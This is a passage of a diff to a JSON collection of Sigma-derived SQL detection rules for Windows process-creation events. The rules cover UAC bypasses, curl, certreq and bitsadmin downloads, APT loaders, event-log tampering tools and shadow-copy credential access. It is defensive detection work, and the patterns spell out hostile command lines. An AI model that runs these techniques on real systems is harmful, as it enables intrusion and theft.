'\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE 'net use \\\\\\\\\\%DomainController\\%\\\\C$ \"P@ssw0rd\" %' ESCAPE '\\' OR CommandLine LIKE 'dir c:\\\\%.doc% /s' ESCAPE '\\' OR CommandLine LIKE 'dir \\%TEMP\\%\\\\%.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_change.yml" + "filename": "proc_creation_win_apt_turla_commands_critical.yml" }, { - "title": "Execution via stordiag.exe", - "id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", - "status": "test", - "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", - "author": "Austin Songer (@austinsonger)", + "title": "Suspicious Curl.EXE Download", + "id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", + "status": "experimental", + "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate usage of stordiag.exe." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\stordiag.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fltmc.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'c:\\\\windows\\\\system32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'c:\\\\windows\\\\syswow64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND ((CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\' OR CommandLine LIKE '%.vbe' ESCAPE '\\' OR CommandLine LIKE '%.vbs' ESCAPE '\\'))) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--silent --show-error --output %' ESCAPE '\\' AND CommandLine LIKE '%gfw-httpget-%' ESCAPE '\\' AND CommandLine LIKE '%AppData%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_stordiag_susp_child_process.yml" + "filename": "proc_creation_win_curl_susp_download.yml" }, { - "title": "Elise Backdoor Activity", - "id": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "title": "Devtoolslauncher.exe Executes Specified Binary", + "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", "status": "test", - "description": "Detects Elise backdoor activity used by APT32", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "The Devtoolslauncher.exe executes other binary", + "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", "tags": [ - "attack.g0030", - "attack.g0050", - "attack.s0081", - "attack.execution", - "attack.t1059.003" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Legitimate use of devtoolslauncher.exe by legitimate user" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Microsoft\\\\Network\\\\svchost.exe' ESCAPE '\\' OR (CommandLine LIKE '%\\\\Windows\\\\Caches\\\\NavShExt.dll%' ESCAPE '\\' AND CommandLine LIKE '%/c del%' ESCAPE '\\')) OR ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\MICROS~1\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\') AND CommandLine LIKE '%,Setting%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\devtoolslauncher.exe' ESCAPE '\\' AND CommandLine LIKE '%LaunchForDeploy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_elise.yml" + "filename": "proc_creation_win_lolbin_devtoolslauncher.yml" }, { - "title": "CMSTP UAC Bypass via COM Object Access", - "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", - "status": "stable", - "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", - "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", + "title": "Delete All Scheduled Tasks", + "id": "220457c1-1c9f-4c2e-afe6-9598926222c1", + "status": "experimental", + "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND (ParentCommandLine LIKE '% /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /delete %' ESCAPE '\\' AND CommandLine LIKE '%/tn \\*' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml" + "filename": "proc_creation_win_schtasks_delete_all.yml" }, { - "title": "Rundll32 JS RunHTMLApplication Pattern", - "id": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + "title": "UAC Bypass Using PkgMgr and DISM", + "id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", "status": "test", - "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%javascript%' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\mshtml,RunHTMLApplication%' ESCAPE '\\') OR CommandLine LIKE '%;document.write();GetObject(\"script%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\pkgmgr.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_rundll32_js_runhtmlapplication.yml" + "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml" }, { - "title": "Suspicious Whoami.EXE Execution From Privileged Process", - "id": "79ce34ca-af29-4d0e-b832-fc1b377020db", - "status": "experimental", - "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", + "title": "VolumeShadowCopy Symlink Creation Via Mklink", + "id": "40b19fa6-d835-400c-b301-41f3a2baacaf", + "status": "stable", + "description": "Shadow Copies storage symbolic link creation using operating systems utilities", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Legitimate administrator working with shadow copies, access for backup purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'whoami.exe' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\' OR User LIKE '%TrustedInstaller%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml" + "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" }, { - "title": "Renamed Mavinject.EXE Execution", - "id": "e6474a1b-5390-49cd-ab41-8d88655f7394", - "status": "experimental", - "description": "Detects the execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", - "author": "frack113, Florian Roth", + "title": "MSHTA Suspicious Execution 01", + "id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", + "status": "test", + "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", + "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" + "attack.t1140", + "attack.t1218.005", + "attack.execution", + "attack.t1059.007", + "cve.2020.1599" ], "falsepositives": [ - "Unlikely" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName IN ('mavinject32.exe', 'mavinject64.exe') AND NOT ((NewProcessName LIKE '%\\\\mavinject32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mavinject64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND (CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.lnk%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_mavinject.yml" + "filename": "proc_creation_win_mshta_susp_execution.yml" }, { - "title": "Suspicious Call by Ordinal", - "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", - "status": "stable", - "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", - "author": "Florian Roth (Nextron Systems)", + "title": "Sofacy Trojan Loader Activity", + "id": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", + "status": "test", + "description": "Detects Trojan loader activity as used by APT28", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.g0007", + "attack.execution", + "attack.t1059.003", "attack.defense_evasion", + "car.2013-10-002", "attack.t1218.011" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment", - "Windows control panel elements have been identified as source (mmc)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,#%' ESCAPE '\\' OR CommandLine LIKE '%, #%' ESCAPE '\\' OR CommandLine LIKE '%.dll #%' ESCAPE '\\' OR CommandLine LIKE '%.ocx #%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%EDGEHTML.dll%' ESCAPE '\\' AND CommandLine LIKE '%#141%' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Tracker.exe%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\FileTracker32.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker32.dll\",#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll\",#1%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\%APPDATA\\%\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.dat\",%' ESCAPE '\\' OR (CommandLine LIKE '%.dll\",#1' ESCAPE '\\' OR CommandLine LIKE '%.dll #1' ESCAPE '\\' OR CommandLine LIKE '%.dll\" #1' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_by_ordinal.yml" + "filename": "proc_creation_win_apt_sofacy.yml" }, { - "title": "Copy from Admin Share", - "id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", - "status": "test", - "description": "Detects a suspicious copy command to or from an Admin share or remote", - "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", + "title": "Suspicious NTLM Authentication on the Printer Spooler Service", + "id": "bb76d96b-821c-47cf-944b-7ce377864492", + "status": "experimental", + "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", + "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.collection", - "attack.exfiltration", - "attack.t1039", - "attack.t1048", - "attack.t1021.002" + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1212" ], "falsepositives": [ - "Administrative scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\') OR CommandLine LIKE '%\\\\Sysvol\\\\%' ESCAPE '\\') AND ((((NewProcessName LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE')) OR ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%copy%' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\powershell.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe%' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND (CommandLine LIKE '%spoolss%' ESCAPE '\\' OR CommandLine LIKE '%srvsvc%' ESCAPE '\\' OR CommandLine LIKE '%/print/pipe/%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_copy_lateral_movement.yml" + "filename": "proc_creation_win_rundll32_ntlmrelay.yml" }, { - "title": "Uninstall Sysinternals Sysmon", - "id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", - "status": "test", - "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", - "author": "frack113", + "title": "HackTool - SharpEvtMute Execution", + "id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "status": "experimental", + "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562.002" ], "falsepositives": [ - "Legitimate administrators might use this command to remove Sysmon for debugging purposes" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-u%' ESCAPE '\\' OR CommandLine LIKE '%/u%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpEvtMute.exe' ESCAPE '\\' OR Description = 'SharpEvtMute' OR (CommandLine LIKE '%--Filter \"rule %' ESCAPE '\\' OR CommandLine LIKE '%--Encoded --Filter \\\\\"%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_sysmon_uninstall.yml" + "filename": "proc_creation_win_hktl_sharpevtmute.yml" }, { - "title": "DumpStack.log Defender Evasion", - "id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", - "status": "test", - "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Rundll32 Execution With Image Extension", + "id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", + "status": "experimental", + "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", + "author": "Hieu Tran", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DumpStack.log' ESCAPE '\\' OR CommandLine LIKE '% -o DumpStack.log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.exe') AND (CommandLine LIKE '%.bmp%' ESCAPE '\\' OR CommandLine LIKE '%.cr2%' ESCAPE '\\' OR CommandLine LIKE '%.eps%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.ico%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.nef%' ESCAPE '\\' OR CommandLine LIKE '%.orf%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.raw%' ESCAPE '\\' OR CommandLine LIKE '%.sr2%' ESCAPE '\\' OR CommandLine LIKE '%.tif%' ESCAPE '\\' OR CommandLine LIKE '%.tiff%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml" + "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml" }, { - "title": "Potential PowerShell Obfuscation Via WCHAR", - "id": "e312efd0-35a1-407f-8439-b8d434b438a6", + "title": "Suspicious Use of CSharp Interactive Console", + "id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", "status": "test", - "description": "Detects suspicious encoded character syntax often used for defense evasion", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of CSharp interactive console by PowerShell", + "author": "Michael R. (@nahamike01)", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.t1127" ], "falsepositives": [ - "Unknown" + "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%(WCHAR)0x%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\csi.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND OriginalFileName = 'csi.exe')" ], - "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml" + "filename": "proc_creation_win_csi_use_of_csharp_console.yml" }, { - "title": "UAC Bypass Using Windows Media Player - Process", - "id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", - "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "title": "Suspicious Certreq Command to Download", + "id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", + "status": "experimental", + "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\mmc.exe\" \"C:\\\\Windows\\\\system32\\\\eventvwr.msc\" /s' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certreq.exe' ESCAPE '\\' OR OriginalFileName = 'CertReq.exe') AND (CommandLine LIKE '% -Post %' ESCAPE '\\' AND CommandLine LIKE '% -config %' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\windows\\\\win.ini %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_wmp.yml" + "filename": "proc_creation_win_lolbin_susp_certreq_download.yml" }, { - "title": "Suspicious Download From Direct IP Via Bitsadmin", - "id": "99c840f2-2012-46fd-9141-c761987550ef", + "title": "PUA - DefenderCheck Execution", + "id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", + "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1027.005" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DefenderCheck.exe' ESCAPE '\\' OR Description = 'DefenderCheck'))" ], - "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml" + "filename": "proc_creation_win_pua_defendercheck.yml" }, { - "title": "Suspicious Parent Double Extension File Execution", - "id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", - "status": "experimental", - "description": "Detect execution of suspicious double extension files in ParentCommandLine", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - SILENTTRINITY Stager Execution", + "id": "03552375-cc2c-4883-bbe4-7958d5a980be", + "status": "test", + "description": "Detects SILENTTRINITY stager use via PE metadata", + "author": "Aleksey Potapov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1036.007" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%.doc.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.docx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.xls.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.xlsx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.ppt.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.pptx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.rtf.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.pdf.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.txt.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.doc.js' ESCAPE '\\' OR ParentProcessName LIKE '%.docx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.xls.js' ESCAPE '\\' OR ParentProcessName LIKE '%.xlsx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.ppt.js' ESCAPE '\\' OR ParentProcessName LIKE '%.pptx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.rtf.js' ESCAPE '\\' OR ParentProcessName LIKE '%.pdf.js' ESCAPE '\\' OR ParentProcessName LIKE '%.txt.js' ESCAPE '\\') OR (ParentCommandLine LIKE '%.doc.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.doc.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.js%' 